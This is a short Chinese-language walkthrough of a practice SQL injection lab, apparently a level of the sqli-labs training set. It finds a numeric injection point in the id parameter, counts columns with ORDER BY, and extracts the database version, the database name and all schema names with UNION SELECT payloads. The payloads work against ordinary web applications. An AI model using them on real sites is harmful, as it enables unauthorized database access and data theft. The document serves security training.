0x00
目标:取得security数据库中的emails表里的数据
0x01
加一个?id=1, 添加一个单引号发现报错, 后来再构造成?id=1' and 1=1--+发现还是报错, 尝试?id=1 and 1=1发现正常,于是认为是数字型注入.
1.png
2.png
同样是order by判断有几列可以显示数据
直接order by 3正常, order by 4 报超出范围可以认为只有三列, 这里跟less-1有点区别, 但是都正确, 这种貌似更省力
3.png
4.png
构造union select 1,version(),database()来查询数据库版本以及数据库名称, 这里关于查询版本有两种方式@@version也可以
5.png
6.png
构造语句查询所有数据库名
union select 1,2,(select group_concat(schema_name) from information_schema.schemata), 后面的方法都是类似Less-1, 主要就是这个是数字型注入, 不用在前面添加单引号和后面的注释符而已
7.png
网友评论